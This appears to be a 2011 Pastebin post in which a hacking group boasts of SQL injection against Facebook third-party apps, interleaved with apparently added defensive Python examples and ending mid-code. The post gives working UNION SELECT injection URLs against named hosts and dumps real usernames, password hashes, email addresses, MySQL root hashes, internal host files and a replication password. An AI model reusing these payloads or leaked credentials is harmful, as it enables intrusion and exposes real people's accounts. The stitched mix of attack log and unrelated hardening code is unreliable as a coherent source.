Posted on Pastebin by a guest, Sep 4th, 2011
=================================================================
FaceBook's servers were hacked by Inj3ct0r team. Hack of the year!
=================================================================

Original: http://inj3ct0r.com/exploits/11638

English translation

Inj3ct0r official website => Inj3ct0r.com

[0x00] [Introduction]
[0x01] [First impressions]
[0x02] [Search for bugs]
[0x03] [Inj3ct0r Crash Exploit]
[0x04] [Conclusion]
[0x05] [Greetz]

If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845

[0x00] [Introduction]

+ [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and to close loopholes in the system.

We did not change the main page, did not sell the server backup and did not delete files.

We have demonstrated the flaw in the system. Start =] ..

[0x01] [First impressions]

At first glance, FaceBook is a well-protected social network.
Scanning the FaceBook server did not give anything interesting ... )

..>

Initiating Parallel DNS resolution of 1 host.
Completed Parallel DNS resolution of 1 host.
Initiating SYN Stealth Scan
Scanning facebook.com (69.63.181.11) [1000 ports]
Discovered open port 443/tcp on 69.63.181.11
Discovered open port 80/tcp on 69.63.181.11
Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
Initiating Service scan
Scanning 2 services on facebook.com (69.63.181.11)
Service scan Timing: About 50.00% done; ETC:
Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
NSE: Script scanning 69.63.181.11.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.38s elapsed
NSE: Script Scanning completed.
Nmap scan report for facebook.com (69.63.181.11)
Host is up (0.17s latency).
Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
Not shown: 998 filtered ports
PORT    STATE SERVICE   VERSION
80/tcp  open  http
443/tcp open  ssl/https

go ahead .. =]

[0x02] [Search for bugs]

We use GoOgle.com

request: Facebook+Vulnerability [search]

We see a lot of different bugs / exploits / etc ... Mostly only XSS vulnerabilities

but all this can be found by searching : http://inj3ct0r.com/search

All vulnerabilities are closed (nothing works ...). Let us go once again to GoOgle.com

request: site:facebook.com WARNING error

=\ fuck...
Let us not lose heart) Hackers are not looking for easy ways

Visit Facebook.com

Let us search for bugs in Web Apps.

http://www.facebook.com/robots.txt

oooooooooooooooooooooooooooo
User-agent: *
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

User-agent: Slurp
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

User-agent: msnbot
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

# E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
Sitemap: http://www.facebook.com/sitemap.php
oooooooooooooooooooooooooooo

nothing interesting =\

http://apps.facebook.com/tvshowchat/

I looked closely and noticed links

http://apps.facebook.com/tvshowchat/show.php?id=1 out of habit, check the variable for a vulnerability...

check:

http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r

oooooooooooooooooooooooooooo

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164

and other....

oooooooooooooooooooooooooooo

O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.

Writing exploits, I got the following:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1

oooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

5.0.45-log <= ALERT!!!

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

and other....

oooooooooooooooooooooooooooo

Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log

super =] Now we can just say that there is an SQL Injection vulnerability

http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]

Now we know that there is MySql 5.0.45-log

Then let's write another exploit to display tables with information_schema.tables:

http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1

oooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38

Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/

201 <= ALERT!!! 201 tables!

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

and other....

oooooooooooooooooooooooooooo
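The two requests above (a non-numeric id that makes mysql_fetch_array() warn, and a UNION SELECT that returns @@version) share one root cause: the id parameter is concatenated into the SQL text, and the raw database error is echoed to the browser. The following is an added example, not code from the page or from the tvshowchat application: it models that show.php pattern in Python on an in-memory SQLite database (a constructed stand-in for the real tv schema, with sqlite_version() in place of MySQL's @@version) and puts the type-checked, parameterised version beside it.

```python
import sqlite3

# Constructed stand-in for the database behind show.php (not the real 'tv' schema):
# one table keyed by an integer id, as the id=1 link suggests.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shows (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO shows (id, title) VALUES (?, ?)",
                     [(1, "Lost"), (2, "Heroes")])
    conn.commit()
    return conn

def show_vulnerable(conn, show_id):
    """Same shape as the page's show.php: the request parameter is pasted into
    the SQL text, so the caller controls the query, not just a value in it."""
    sql = "SELECT title FROM shows WHERE id=" + show_id
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        # show.php echoed the raw MySQL warning to the browser; returning the
        # message here makes that information leak visible to the caller.
        return ["ERROR: " + str(exc)]

def show_hardened(conn, show_id):
    """Reject anything that is not a small positive integer, then bind the value
    as a parameter: the SQL text is constant and the database never parses input."""
    if not show_id.isdigit() or len(show_id) > 10:
        return None  # log the rejected value server-side; never echo the DB error
    return [row[0] for row in
            conn.execute("SELECT title FROM shows WHERE id=?", (int(show_id),))]

# The page's @@version probe, with SQLite's equivalent function.
INJECTED = "1 and 1=2 union select sqlite_version()--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1:       ", show_vulnerable(db, "1"))
    print("vulnerable, id=inj3ct0r:", show_vulnerable(db, "inj3ct0r"))
    print("vulnerable, injected:   ", show_vulnerable(db, INJECTED))
    print("hardened, injected:     ", show_hardened(db, INJECTED))
```

With the concatenated query the injected id returns the engine version instead of a title, and the non-numeric id returns the parser's error text, which is exactly the information the page's warnings leaked; the parameterised version returns nothing for either input and leaves the query shape fixed.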

http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]

Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log

1) AdCode
2) AdTrack
3) Admin_DataStore
4) Admin_User
5) Challenges
6) ChallengesCompleted
7) Comments
8) ContactEmails
9) Content
10) ContentImages
11) FeaturedTemplate
12) FeaturedWidgets
13) Feeds
14) FolderLinks
15) Folders
16) ForumTopics
17) Log
18) LogDumps
19) Newswire
20) NotificationMessages
21) Notifications
22) Orders
23) OutboundMessages
24) Photos
25) Prizes
26) RawExtLinks
27) RawSessions
28) SessionLengths
29) Sites
30) Subscriptions
31) SurveyMonkeys
32) SystemStatus
33) Templates
34) User
35) UserBlogs
36) UserCollectives
37) UserInfo
38) UserInvites
39) Videos
40) WeeklyScores
41) Widgets
42) cronJobs
43) fbSessions

Admin_User

1) id
2) name
3) email
4) password
5) userid
6) ncUid
7) level

User

1) userid
2) ncUid
3) name
4) email
5) isAdmin
6) isBlocked
7) votePower
8) remoteStatus
9) isMember
10) isModerator
11) isSponsor
12) isEmailVerified
13) isResearcher
14) acceptRules
15) optInStudy
16) optInEmail
17) optInProfile
18) optInFeed
19) optInSMS
20) dateRegistered
21) eligibility
22) cachedPointTotal
23) cachedPointsEarned
24) cachedPointsEarnedThisWeek
25) cachedPointsEarnedLastWeek
26) cachedStoriesPosted
27) cachedCommentsPosted
28) userLevel

http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]

Current Database : signalpa_fbmFundRraise
Database User : signalpa_rockaja@localhost
MySQL Version : 5.0.85-community

DATABASE
1) information_schema
2) signalpa_CelebrityPuzzle
3) signalpa_EBF
4) signalpa_appNotification
5) signalpa_appnetwork
6) signalpa_dailyscriptures
7) signalpa_ebayfeed
8) signalpa_fbmFundRraise
9) signalpa_fbmFundRraisebeta
10) signalpa_netcards
11) signalpa_paypal
12) signalpa_thepuzzle

signalpa_fbmFundRraise
1) Campaigns
2) Campaigns_Temp
3) FB_theme
4) IfundDollars
5) Languages
6) Payments
7) Paymentsoops
8) Supporters
9) Users
10) Withdrawals
11) invites
12) invites_copy
13) mp_passwords
14) payment_codes
15) txt_codes
16) valid_servers
17) weeklyBonus

Column: Users

1) id
2) name
3) email
4) mobile_no
5) address
6) country
7) password
8) organisation
9) date_created
10) date_updated
11) status
12) facebook_id
13) isFacebookFan
14) verify
15) paypalUse
16) paypalEmail
17) bacUse
18) bacAcc
19) bacName
20) bacLocation
21) bacCountry
22) bacIBAN
23) bacSort_code
24) current_rank
25) new_rank
26) cronjob
27) max_fundraise

Column: mp_passwords

1) id
2) password
3) username
4) status
5) number
6) rc
7) referer
8) transID
9) currency
10) transType
11) amount
12) confirmed
13) date

signalpa_paypal
1) paypal_cart_info
2) paypal_payment_info
3) paypal_subscription_info
[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:

Column: paypal_cart_info
1) txnid
2) itemname
3) itemnumber
4) os0
5) on0
6) os1
7) on1
8) quantity
9) invoice
10) custom

Column : paypal_payment_info

1) firstname
2) lastname
3) buyer_email
4) street
5) city
6) state
7) zipcode
8) memo
9) itemname
10) itemnumber
11) os0
12) on0
13) os1
14) on1
15) quantity
16) paymentdate
17) paymenttype
18) txnid
19) mc_gross
20) mc_fee
21) paymentstatus
22) pendingreason
23) txntype
24) tax
25) mc_currency
26) reasoncode
27) custom
28) country
29) datecreation


http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]

Current Database : tv
Database User : tomkincaid@ps5008.dreamhost.com
MySQL Version : 5.0.45-log

DATABASES

1) information_schema
2) astro
3) candukincaid
4) cemeteries
5) churchwpdb
6) countdownapp
7) crush
8) dare
9) friendiq
10) giants
11) hookup
12) jauntlet
13) loccus
14) luciacanduwp
15) maps
16) martisor
17) mediax
18) mostlikely
19) music
20) pimpfriends
21) plans
22) politicsapp
23) postergifts
24) posters2
25) projectbasecamp
26) pwnfriends
27) quiz
28) seeall
29) send
30) supporter
31) swapu
32) tomsapps
33) travelbug

tab.send

1) app
2) item
3) itemforuser
4) neverblue
5) user

Columns

user(12454)

1) userid
2) siteid
3) appkey
4) session
5) points
6) added
7) removed

Tab. candukincaid

1) wp_comments
2) wp_links
3) wp_options
4) wp_post****
5) wp_posts
6) wp_px_albumPhotos
7) wp_px_albums
8) wp_px_galleries
9) wp_px_photos
10) wp_px_plugins
11) wp_term_relationships
12) wp_term_taxonomy
13) wp_terms
14) wp_user****
15) wp_users

Column wp_users

1) ID
2) user_login
3) user_pass
4) user_nicename
5) user_email
6) user_url
7) user_registered
8) user_activation_key
9) user_status
10) display_name

etc...

http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]

> ~ inj3ct0r_facebook_exploit [ENTER]

root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
muu:*74A45B921A1A918B18AE9B137396E5A67E006262
monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220

http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]

Database: affinispac_fb
User: affinispac_fb@localhost
Version: 5.0.67-community

http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]

>plucky@localhost : facebook : 4.0.13-log

etc... =]

Next xD

Database: thetvdb
User: thetvdb@localhost
Version: 5.0.51a-24-log

[Database]: thetvdb

[1]aka_seriesname
[2]apiusers
[3]banners
[4]deletions
[5]genres
[6]imgstatus
[7]languages
[8]mirrors
[9]networks
[10]ratings
[11]runtimes
[12]seriesactors
[13]seriesupdates
[14]translation_episodename
[15]translation_episodeoverview
[16]translation_labels
[17]translation_seriesname
[18]translation_seriesoverview
[19]tvepisodes
[20]tvseasons
[21]tvseries
[22]user_episodes
[23]users

users:

id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
lastupdatedby_admin,mirrorupdate

[userpass]

[1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
[2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
[3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
[4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
[5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
[6] 3d801aa532c1cec3ee82d87a99fdf63f

[Database]: wiki

[24]archive
[25]categorylinks
[26]externallinks
[27]filearchive
[28]hitcounter
[29]image
[30]imagelinks
[31]interwiki
[32]ipblocks
[33]job
[34]langlinks
[35]logging
[36]math
[37]objectcache
[38]oldimage
[39]page
[40]page_restrictions
[41]pagelinks
[42]querycache
[43]querycache_info
[44]querycachetwo
[45]recentchanges
[46]redirect
[47]revision
[48]searchindex
[49]site_stats
[50]templatelinks
[51]text
[52]trackbacks
[53]transcache
[54]user
[55]user_groups
[56]user_newtalk
[57]watchlist

user:

user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
user_email_token_expires,user_registration,user_editcount

['user_name'] : ['user_pass']

[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
[4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
[5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
[6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
[7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
[8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
[9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
[10] Bsudbury: [10] 827d07956629c37855f3518374821872:
[11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
[12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
[13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
[14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
[15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
[16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
[17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
[18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
[19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
[20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
[21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
[22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
[23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
[24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
[25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
[26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
[27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
[28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
[29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
[30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
[31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
[32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
[33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
[34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
[35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
[36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
[37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
[38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
[39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
[40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
[41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
[42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
[43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
[44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
[45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
[46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
[47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
[48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
[49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
[50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
[51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
[52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
[53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
[54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
[55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
[56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
[57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
[58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
[59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
[60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
[61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
[62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
[63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
[64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
[65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
[66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
[67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
[68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
[69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
[70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
[71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
[72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
[73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
[74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
[75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
[76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
[77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
[78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
[79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
[80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
[81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
[82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
[83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
[84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
[85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
[86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
[87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
[88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
[89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
[90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
[91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
[92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
[93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
[94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
[95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
[96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:

---------------------------------------------------------------------------------------------------------------------------------------------------

read /etc/hosts

127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com

----------------------------------

/etc/my.cnf

#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14

server-id = 5

#master-host=69.63.176.141
#master-user=romis_user
#master-password=romis0123
#master-connect-retry=60
replicate-do-db=miserman

#log-slave-updates
expire_logs_days = 14
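The /etc/my.cnf fragment above carries a replication password in a commented-out line; commenting a directive out does not stop anyone who can read the file from reading the credential. As an added example (not from the page), the checker below parses a config in the same shape, with a placeholder password, and reports plaintext credentials whether active or commented, the binary-log path (every data change is written there, so the directory needs the same protection as the data files) and duplicated options, which MySQL resolves to the last occurrence because '-' and '_' are interchangeable in option names.

```python
import re

# Constructed config in the shape of the /etc/my.cnf fragment on the page.
# The host and password values are placeholders, not the ones the page shows.
SAMPLE_MY_CNF = """\
[mysqld]
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 5
#master-host=192.0.2.10
#master-user=replica_user
#master-password=EXAMPLE-PLACEHOLDER
#master-connect-retry=60
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
"""

# key=value lines, with an optional leading '#' so commented-out directives are
# still parsed (a commented credential is as readable as an active one).
OPTION_RE = re.compile(
    r"^\s*(?P<comment>#)?\s*(?P<key>[A-Za-z][\w-]*)\s*=\s*(?P<value>.*?)\s*$")

def normalize(key):
    """MySQL treats '-' and '_' in option names as interchangeable."""
    return key.lower().replace("-", "_")

def audit_my_cnf(text):
    """Return findings (dicts with line, key, severity, issue), in file order."""
    findings = []
    active = {}  # normalized key -> first line it was set on (uncommented only)
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = OPTION_RE.match(raw)
        if not m:
            continue
        key = normalize(m.group("key"))
        value = m.group("value")
        commented = m.group("comment") is not None
        if "password" in key and value:
            note = " (commented out, still readable)" if commented else ""
            findings.append({"line": lineno, "key": key, "severity": "high",
                             "issue": "plaintext credential in config file" + note})
        if commented:
            continue
        if key == "log_bin":
            findings.append({"line": lineno, "key": key, "severity": "medium",
                             "issue": "binary log path: every data change is written "
                                      "here, restrict the directory like the data files"})
        if key in active:
            findings.append({"line": lineno, "key": key, "severity": "low",
                             "issue": "option already set on line %d; the last value wins"
                                      % active[key]})
        else:
            active[key] = lineno
    return findings

if __name__ == "__main__":
    for f in audit_my_cnf(SAMPLE_MY_CNF):
        print("line %(line)2d  %(severity)-6s %(key)-20s %(issue)s" % f)
```

The finding records carry the key and line but never the value, so the report itself does not become a second copy of the secret.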

I think we found a sufficient number of vulnerabilities!

---------------------------

[0x03] [Inj3ct0r Crash Exploit]

So .. moving on to the fun, friends

To avoid vandalism by script-kiddies I will not give you a link to shell.php, but I enclose images and some interesting queries =]

..> Inj3ct0rExploit start . + . + . + . + . + . + .

wp_posts

post_password

wp_users

user_pass

done.....

WordPress! oO one of the modules installed on facebook is WordPress!

check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1

oooooooooooooooooooooooooooo

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67

3 <= ALERT! Users! =]

Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124

oooooooooooooooooooooooooooo

..> Inj3ct0r_Crach_exploit [ENTER]

user:

admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.

cracker:

admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com

see request:

http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
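The three requests above, and the earlier ones against show.php, are what a defender sees in the web-server access log, one of them percent-encoded. As an added example (not from the page), the script below parses constructed Apache-style log lines shaped like those requests, percent-decodes the query string (repeatedly but bounded, so double encoding does not hide the payload), and flags the union/select, information_schema/@@version, concat_ws and comment-terminator signatures as well as a non-numeric value in the id parameter, which is the first probe the page shows. Client addresses, timestamps and sizes are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format lines shaped like the page's requests
# against show.php. Client addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
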